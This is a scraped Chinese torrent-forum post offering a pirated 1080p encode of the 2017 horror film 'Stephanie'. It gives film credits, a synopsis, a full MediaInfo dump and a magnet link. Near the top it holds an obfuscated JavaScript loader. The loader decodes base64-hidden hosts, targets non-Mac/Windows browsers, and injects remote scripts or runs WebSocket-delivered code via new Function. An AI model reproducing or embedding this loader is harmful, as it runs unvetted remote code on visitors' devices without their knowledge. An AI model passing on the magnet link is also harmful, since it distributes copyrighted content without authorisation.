丝黛芬妮[双语字幕].Stephanie.2017.1080p.BluRay.DTS.x265-10bit 8.27GB

版主小s 1月前 439

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 丝黛芬妮
◎片  名 Stephanie
◎年  代 2017
◎产  地 美国
◎类  别 恐怖
◎语  言 英语
◎上映日期 2017-04-27(美国)
◎IMDb链接 https://www.imdb.com/title/tt3829378/
◎豆瓣评分 5.4/10 (1288人评价)
◎豆瓣链接 https://movie.douban.com/subject/26313743/
◎片  长 89分钟
◎导  演 阿齐瓦·高斯曼 Akiva Goldsman (id:1009507)
◎编  剧 本·柯林斯 Ben Collins (id:1377674)
       卢克·皮厄特罗斯基 Luke Piotrowski (id:1377675)
◎演  员 弗兰克·格里罗 Frank Grillo (id:1100321)
       安娜·托芙 Anna Torv (id:1000028)
       哈罗德·佩里诺 Harold Perrineau (id:1130099)
       肯尼斯·崔 Kenneth Choi (id:1027505)
       席瑞·克鲁克斯 Shree Crooks (id:1363352)
       亚当·拉扎尔-怀特 Adam Lazarre-White (id:1113406)
       乔治·沙佩尔森 George Sharperson (id:1141418)
       Al Whiting Al Whiting (id:1167062)
       拉桑德拉·吉布森 LaSaundra Gibson (id:1405666)
       詹妮弗·斯彭斯 Jennifer Spence (id:1433799)

◎标  签 恐怖 / 惊悚 / 美国 / 悬疑 / 萝莉 / 美国电影 / 奇幻 / 2017

◎简  介
  小女主在父亲不在家时,经历了一场神秘的全球危机,在一个强大的邪恶的力量中侥幸生存下来,这个强大的邪恶力量就隐藏在他们家里,并进入她的身体,她的父母,试图从神秘力量中拯救他们的女儿...

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 59403705764107791508509552763622450832 (0x2CB0BCD1A41280FF07A64F0BE3D8E690)

  4. Complete name                            : [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 8.27 GiB

  8. Duration                                 : 1 h 26 min

  9. Overall bit rate                         : 13.7 Mb/s

  10. Movie name                               : Stephanie 2017 1080p BluRay DTS [email protected]

  11. Encoded date                             : UTC 2021-08-09 00:25:37

  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@High

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 26 min

  21. Bit rate                                 : 12.2 Mb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 800 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.331

  31. Stream size                              : 7.34 GiB (89%)

  32. Title                                    : [email protected]

  33. Writing library                          : x265 - H.265/HEVC codec

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 26 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 930 MiB (11%)

  51. Title                                    : English

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. Format                                   : PGS

  58. Muxing mode                              : zlib

  59. Codec ID                                 : S_HDMV/PGS

  60. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration                                 : 1 h 14 min

  62. Bit rate                                 : 13.3 kb/s

  63. Count of elements                        : 868

  64. Stream size                              : 7.10 MiB (0%)

  65. Title                                    : CHS

  66. Language                                 : Chinese

  67. Default                                  : Yes

  68. Forced                                   : No


  69. Text #2

  70. ID                                       : 4

  71. Format                                   : PGS

  72. Muxing mode                              : zlib

  73. Codec ID                                 : S_HDMV/PGS

  74. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration                                 : 1 h 14 min

  76. Bit rate                                 : 13.5 kb/s

  77. Count of elements                        : 868

  78. Stream size                              : 7.24 MiB (0%)

  79. Title                                    : CHT

  80. Language                                 : Chinese

  81. Default                                  : No

  82. Forced                                   : No


  83. Text #3

  84. ID                                       : 5

  85. Format                                   : PGS

  86. Muxing mode                              : zlib

  87. Codec ID                                 : S_HDMV/PGS

  88. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  89. Duration                                 : 1 h 14 min

  90. Bit rate                                 : 23.6 kb/s

  91. Count of elements                        : 868

  92. Stream size                              : 12.6 MiB (0%)

  93. Title                                    : CHS&ENG

  94. Language                                 : Chinese

  95. Default                                  : No

  96. Forced                                   : No


  97. Text #4

  98. ID                                       : 6

  99. Format                                   : PGS

  100. Muxing mode                              : zlib

  101. Codec ID                                 : S_HDMV/PGS

  102. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  103. Duration                                 : 1 h 14 min

  104. Bit rate                                 : 23.8 kb/s

  105. Count of elements                        : 868

  106. Stream size                              : 12.7 MiB (0%)

  107. Title                                    : CHT&ENG

  108. Language                                 : Chinese

  109. Default                                  : No

  110. Forced                                   : No


  111. Menu

  112. 00:00:00.000                             : en:Chapter 01

  113. 00:04:55.420                             : en:Chapter 02

  114. 00:08:25.171                             : en:Chapter 03

  115. 00:12:01.512                             : en:Chapter 04

  116. 00:17:13.991                             : en:Chapter 05

  117. 00:20:51.208                             : en:Chapter 06

  118. 00:25:03.794                             : en:Chapter 07

  119. 00:29:13.877                             : en:Chapter 08

  120. 00:33:32.135                             : en:Chapter 09

  121. 00:37:58.276                             : en:Chapter 10

  122. 00:42:10.027                             : en:Chapter 11

  123. 00:47:49.867                             : en:Chapter 12

  124. 00:50:44.708                             : en:Chapter 13

  125. 00:56:03.986                             : en:Chapter 14

  126. 00:59:50.545                             : en:Chapter 15

  127. 01:02:06.014                             : en:Chapter 16

  128. 01:04:40.168                             : en:Chapter 17

  129. 01:07:17.158                             : en:Chapter 18

  130. 01:12:04.779                             : en:Chapter 19

  131. 01:18:18.652                             : en:Chapter 20



TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:B63CA2C4EC27AE4A2E3C2DC9FDC526E1410CA933
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回